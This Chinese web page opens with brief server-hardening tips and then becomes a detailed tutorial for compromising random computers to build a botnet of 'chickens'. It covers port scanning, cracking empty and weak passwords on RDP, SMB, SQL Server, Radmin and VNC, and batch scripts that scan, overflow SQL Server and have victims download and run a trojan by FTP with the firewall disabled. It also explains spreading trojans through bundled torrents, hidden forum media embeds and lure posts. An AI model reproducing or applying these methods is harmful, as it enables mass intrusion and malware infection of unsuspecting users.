vnc查看端口_vnc端口扫描

hacker|
206

如何减少服务器被端口扫描和枚举攻击

解决端口被扫描和枚举攻击,其实还是比较简单的,我们对服务器做几处修改,就能避免。一、修改管理员用户名默认的管理员用户名是administrator,通过日志也能看出,绝大部分的试图登录都是用这个用户名的。可以进入 开始--程序--管理攻击--本地安全策略--本地策略--安全选项里面重新命名管理员。二、设置账户锁定策略账户锁定策略是指用户在几次尝试之后都没有正确输入密码,那么该账户就会被锁定一定的时间。可以在开始--程序--管理攻击--本地安全策略--账户策略--账户锁定策略里面设置。三、修改远程端口把端口号重新设置一下,那么端口扫描的时候就扫描不到了,相对来说就比较安全了。我以前有写过一篇修改远程端口的日志,具体的修改远程端口的方法请看这里。四、使用PcAnywhere或者Real VNC如果使用了PcAnywhere或者Real VNC的话,连上去的时候,必须有一个客户端,我发现PcAnywhere对Windows 7的支持不好,在使用的时候比较不方便。Real VNC比较方便,支持Windows 7和XP等系统,建议大家可以试试。本文标签为: pcanywhere, real VNC, windows 2003, 服务器安全,端口扫描,

怎么用手抓鸡

抓肉鸡的11种方法

首先得准备,免杀的STAT 或 一只免杀鸽子或者其他的远控,一个免费空间,一些工具(下面会提到)

(1)

扫3389端口抓肉鸡

(适合新手)(抓不了国外肉鸡)

现在国内网络上流传着一种克隆版的XP,安装后会默认开启一个账号为new,密码为空的账户,而且基本上都是开着3389的,我们就可以利用这一点来抓肉鸡。首先用端口扫描工具(如S扫)扫一段IP的3389端口,扫完后就直接用远程桌面连接开放3389的机器(也可以把结果保存为文本文件,用批量生成3389连接的工具来连接),然后输入账号new登入,如果别人的电脑前没人的话你就可以去你的空间下载你传好的木马安装拉~~这种方法只针XP系统,如果遇到2000或者2003系统就不要试了呵呵。缺点也很明显,如果别人不是用new账号登入XP的,你再登入上去就会把他挤出去(XP只支持单用户登入,用户登入需要用工具开),或者电脑前有人你就不可能去打开IE下载木马了。

(2)

扫135端口抓肉鸡

首先先用端口扫描器扫一段IP的135端口,然后把结果保存,再用NTSCAN过滤有弱口令的机器,最后用recton开telnet传马。因为现在135和445端口都被防火墙屏蔽了,只能扫本地的135肉鸡,要抓外地的只能用外地的135肉鸡来扫。(详细动画可以去黑客网站搜索135)

(3)

扫445端口抓肉鸡

和扫135抓肉鸡差不多,首先先用端口扫描器扫一段IP的445端口,然后把结果保存,再用NTSCAN过滤有弱口令的机器,最后用啊D工具包开共享传马。因为现在135和445端口都被防火墙屏蔽了,只能扫本地的445肉鸡,要抓外地的只能用外地的445肉鸡来扫。(详细动画可以去黑客网站搜索445)

(4)

1433端口批量溢出抓肉鸡

这个方法可以实现全自动抓鸡

要用到的工具:S扫 sqlhello.exe nc.exe批处理文件

首先先写个批处理,打开记事本,把以下代码复制修改后,储存为扫描+溢出.bat文件

@echo off

for /f \"eol=; tokens=1,2 delims= \" %%i in (tt.txt) do s.exe tcp %%i %%j 1433 1000 /save

@echo off

for /f \"eol=; tokens=1 delims= \" %%i in (Result.txt) do sqlhello %%i 1433 xxx.xxx.xx.xx 556

还要新建一个tt.txt,里面你要扫的IP段,格式为XXX.XXX.XXX.XXX XXX.XXX.XXX.XXX,中间是空格

1433是要扫描的端口,1000是扫描线程数 ,do sqlhello %%i 1433 xxx.xxx.xx.xx 556 这个里的XXX添你的IP,556是后面NC监听的端口

然后再写个批处理

@echo off

Nc -l -vv -p 556nc.txt%0 这里的556要和上面的保持一致,你也可以改成其他的值,但是2处都要改,然后保存为nc.bat

然后再新建一个nc.txt,里面填写溢出成功后让肉鸡下载你木马的代码。

这里给出一种代码

echo open X.X.X.X(你FTP的IP)daima.txt

echo usernamedaima.txt

echo passworddaima.txt

echo bindaima.txt(以2进制传输数据)

echo get xxx.exe(你的木马的文件名,要放在根目录下)daima.txt

echo byedaima.txt

net stop sharedaccess(关闭WINDOWS自带防火墙)

ftp -s:daima.txt

xxx.exe(也是填你木马的文件名)

del daima.txt

注意上面的代码回车符别删掉,要不然就没法下你的马了。

上面的步骤都搞好后,就可以开始扫肉鸡了。

先打开多个NC.bat,然后再打开扫描+溢出.bat,然后你就可以去睡大觉了。自动扫描,扫描完后自动溢出,溢出后还自动下马执行,爽吧!所以这里讲详细点,呵呵。还有42 21端口也可以这样溢出,只要用这些端口的溢出工具就好了,详细动画可以去黑客网站搜索1433。

忘了说,上面的工具和批处理什么的都要放在同一个文件夹下。

先休息一下,打这么多字累死了

继续

(5)

扫1433抓肉鸡之方法2

要用到的工具:端口扫描器 X-scanSQL综合利用工具

上面我们说过了,1433溢出现在成功率已经不高了,所以我们可以用另一种方法。

开了1433端口的机器一般都装了SQL,所以我们可以猜测SQL弱口令来抓1433肉鸡。

首先先用端口扫描器扫一段IP的1433端口,然后结果保存为文本文件,接着用X-scan导入这些开了1433的IP,然后在扫描参数-全局设置-扫描模块这一栏里只勾上SQL-SERVER就可以了,其他不要勾。然后在插件设置-端口相关设置-待检测端口这一栏,只填1433端口。然后就可以开始扫描了。扫描完成后会有个报告,列出了有弱口令的机器,然后打开SQL综合利用工具,输入你扫到的弱口令来连接,接着打开SQL综合利用工具-利用目录,上传你的木马,然后在用DOS命令执行你的木马就OK了。

(6)

用WINNTAutoAttack扫SA弱口令抓肉鸡

工具:WINNTAutoAttack SQL综合利用工具

打开WINNTAutoAttack,找一段IP添上,然后只勾上设置下的仅对PING检查成功的机器进行检测和SQL列出密码为空的SA账号,接着开始扫描,扫完后,用 SQL综合利用工具连上传马执行就好了。

(7)

扫4899空口令抓肉鸡

工具:端口扫描器 4899探测器 Radmin

首先先用端口扫描器扫一段IP的4899端口,然后用4899探测器导入开了4899端口的IP,接着扫空令,最后用Radmin连接有空口令的机器,带开文件管理,上传的你木马运行就OK了。详细动画可以去黑客网站搜索4899

(8)

扫5900端口抓VNC肉鸡

工具:VNC扫描器 VNC连接器

首先用VNC扫描器扫描一段IP,扫描格式为vscan.exe(扫描器文件名) -i 219.0.0.0-219.255.255.255(扫描IP段) -p 5900 -vnc -vv

扫描完成后会在扫描器所在的同一文件夹生成一个文本文件,打开后有一列IP,IP后面的有一些单词比如patched,banned,vulnerable,只有单词为vulnerable才能连接。接着就用VNC连接器连接,下面就不用多说了吧? 详细动画可以去黑客网站搜索VNC

接下来说说挂马抓肉鸡吧。方法有很多,比如BT挂马、免费空间挂马、迅雷挂马等等,有些我也还不会,呵呵。下面就介绍几种我会的。

(9)

BT挂马

顾名思义,就是把你的木马发布到BT网站让人下载。当然如果只把单纯的木马文件发布上去效果肯定不好,而且现在一般的BT网站也不让发布EXE文件。所以我们需要一些隐藏的手法。我们可以先把木马用捆绑器和一些电影、音乐、游戏捆绑在一起,再压缩成RAR文件发布,谁在开始下载时会知道RAR里有木马呢?当他费了好大劲下载完,打开发现是EXE的格式后,总有些菜鸟会不想辜负自己花费的时间而忍不住打开吧?尤其是下XXX片的时候当然你也可以做个网页木马,然后把你网页木马的地址插入到你发布的文件中(不是所有文件都可以这样的,我只知道RM和EXE文件可以插入),别人下载打开后同时也会带开你的网页木马,如果他的系统没有补供你网页木马所利用的漏洞的话,那他就会中你的马了。有些朋友可能会想,我把木马和其他文件捆绑后格式保持为那个文件(比如RM捆绑木马后保持RM格式),那样别人不就不会怀疑了吗?呵呵,如果真有这样的好事那我上面何不说把木马和BT种子文件绑在一起发布,那样你肉鸡不抓疯了才怪~~所以在这里说一下,木马和其他文件捆绑后生成的文件只能为EXE格式的,除非你有你所捆绑文件的格式的溢出漏洞,那样才能把生成后的文件格式保持为你所捆绑文件的格式。不过这样的漏洞现在很少,大多都被补了,就算有别人也不一定会公开,为什么想想就知道了吧。在这里就说一个最近的RAR溢出漏洞,针对winrar3.6版本以下的所有版本,只要你winrar版本低于3.6,运行绑了牧马的RAR文件后就会中马。此类木马症状为:运行RAR文件后会弹出一个什么什么损坏还是错误的对话框,然后RAR文件体积变小,减少的体积就为木马的体积。然后再次打开这个RAR文件一切正常,不会弹出错误对话框。在这里提醒下各位赶快更新下WINRAR版本,小心中马哈。

(10)

免费空间挂马

其实和BT差不多,就是把做好的木马上传到你申请的免费空间,然后到论坛发些诱惑性的帖子让别人下载你的木马。优点是不用像BT那样做种子,那样不仅要开着电脑,还影响网速。我这几天就是这样挂的,弄个免费空间,上传个木马,到2个XXX论坛发个帖子,每天睡前一顶,才挂了几天,现在每天肉鸡都保持在40-60只。而且大部分都是美国的

(11)

用RM在论坛挂马

首先你弄个只有几秒钟的RM文件,然后插入你的网页木马,接着上传到你的空间,然后到一些支持插入RM连接的论坛发帖子,点插入real media 播放器,输入你的RM牧马地址,然后高度宽度都设为1(这部是为了保证隐蔽性 ),然后点发贴,这样别人在浏览你的帖子就会运行你的RM木马,而我们前面把高和宽设为1,在帖子里RM连接就看不到了。这样别人就不知不觉中了我们的马了 好像FLASH木马也可以这样的,我没试过,大家可以去研究下。

外网可以扫描肉鸡吗?如果不行该怎么做

1:扫3389端口抓肉鸡

这个方法比较简单,适合新手朋友。

原理:

国内流传着一种克隆版的XP,安装后会默认开启一个账号为new,密码为空的账户,而且基本上都是默认开放3389服务的,我们就可以利用这一点来抓肉鸡。

方法:

扫描工具(如S等等)扫一段IP的3389端口,扫完后就直接用3389连接器连接开放3389的机器,也可以把结果保存为文本,用批量生成3389连接的工具生成链接,比较方便的,然后输入账号new登入,如果别人的电脑前没人的话你就可以去你的空间下载你传好的木马然后安装。

这种方法只能是XP系统,如果遇到2000或者2003系统就不要试了,除非有输入法漏洞,不过现在很少了,还有那么多的3389,干嘛在它上面浪费时间呢。汗- -!

这个方法缺点也是大大的,XP只支持单用户登入,,你再登入上去就会把他挤出去,而且不可以抓国外的肉鸡。

建议:中午或者半夜行动,因为有很多的人会开着机子下载,杀毒啊,去睡觉。我们就有可乘之机了。

扣扣: 493082006

2:扫135端口抓肉鸡

步骤:A:

a-先用扫描器扫一段IP的135端口

b-整理一下

c-NTSCAN过滤有弱口令的机器

d-最后用recton开telnet传马

B:

有一些自动抓鸡工具,功能类似,如Bluisland,Wmi,蜜蜂,知音等等,比较傻瓜化的。

这里简单说两点:Bluisland 木马改名为 boot.exe , IP保存为ip.txt,放在同一个目录下。

Wmi 需要修改,具体看操作。

问题:因为国内的一些网络运营商屏蔽了一部分的端口,你可能扫不到135,或者扫到的135没有检测到空口令?!怎么办?!

解决:1:你要开了这3个服务就可以开通

我的电脑--管理---服务

TCP/IP NetBIOS Helper

Remote Procedure Call (RPC) Locator

NT LM Security Support Provider

2:xp打线程补丁 一般线程为1000-3000之间就可以了 如果还扫不到就打4000

打好补丁之后重启。

3:抓鸡前关掉杀软和防火墙(包括系统自带的防火墙)

4:木马一定要免杀 扫的IP范围不要太大 XP系统扫的不是很快 有条件的见意装个2000或者2003系统,可以用syn方式扫

5:换个ip段扫。可以扫下本地的ip段。

6:终极解决方案,拿个服务器扫,这是最好的方法。

或者在鸽子或者别的肉鸡上扫,上传S扫描器

首先要关防火墙 CMD命令 net stop alg /y 或者net stop sharedaccess

S扫描器命令: s.exe syn《xp的机子为tcp》 开始IP,结束IP 端口 线程/save

s.exe syn 125.108.0.0 125.108.155.255 1433 700 /save

: 扫445端口抓肉鸡

扫135抓肉鸡差不多,先用扫描器扫一段IP的445端口,然后把结果整理,再用NTSCAN过滤有弱口令的机器,最后开共享传马,可以用啊D工具包。

屏蔽的话可以扫本地的445试下。

4:1433端口批量溢出抓肉鸡

原理:可以利用漏洞溢出实现全自动抓鸡,不过现在太多人搞,成功率不是很高。

工具:S.exe sqlhello.exe nc.exe 批处理文件

方法:先打开多个NC[非法字节],然后再打开扫描溢出的.bat,然后你就可以去睡觉去了。自动扫描,扫描完后 自动溢出,溢出后自动下马执行。

这就是批处理的威力,希望大家有时间多专研下,我在论坛发布的有详细的批处理教程文章。

另外有42 21等端口的溢出,原理都是类似的,大家自己尝试下吧。

5: 扫1433弱口令抓肉鸡

工具:端口扫描器 X-scan 和 SQL综合利用工具

原理:开1433端口的机器一般都装有SQL,所以我们可以猜测SQL弱口令来抓1433肉鸡。

方法:

先用端口扫描器扫一段IP的1433端口,然后结果保存为文本文件,

接着用X-scan导入这些开了1433的IP,然后在扫描参数-全局设置-扫描模块这一栏里只勾上SQL-SERVER就可以了,其他不要勾。然后在插件设置-端口相关设置-待检测端口这一栏,只填1433端口。然后就可以开始扫描了,扫描完成后会有个报告,列出了有弱口令的机器,

然后打开SQL综合利用工具,输入你扫到的弱口令来连接,接着打开SQL综合利用工具-利用目录,上传你的木马,然后在用DOS命令执行你的木马。

另解:WINNTAutoAttack 原理一样。

6:扫4899空口令抓肉鸡

工具:扫描器 4899探测器 Radmin

原理: Radmin开放的端口默认为4899.

方法:先用端口扫描器扫一段IP的4899端口

用4899探测器导入开了4899端口的IP,过滤下

Radmin连接有空口令的机器,带开文件管理,上传运行你木马

7: 扫5900端口抓VNC肉鸡 工具:VNC扫描器 VNC连接器

原理:VNC开放5900端口

方法:先用VNC扫描器扫描一段IP的5900端口,

扫描格式为vscan.exe(扫描器文件名) -i 219.0.0.0-219.255.255.255(扫描IP段) -p 5900 -vnc -vv 建议扫国外的ip段,国外用这个的比较多,一般机子也不错的。

扫描完成后会在扫描器所在的同一文件夹生成一个文本文件,打开后有一列IP,IP后面的有一些单词比如patched,banned,vulnerable,只有为vulnerable才能连接。接着就用VNC连接器连接

0条大神的评论

发表评论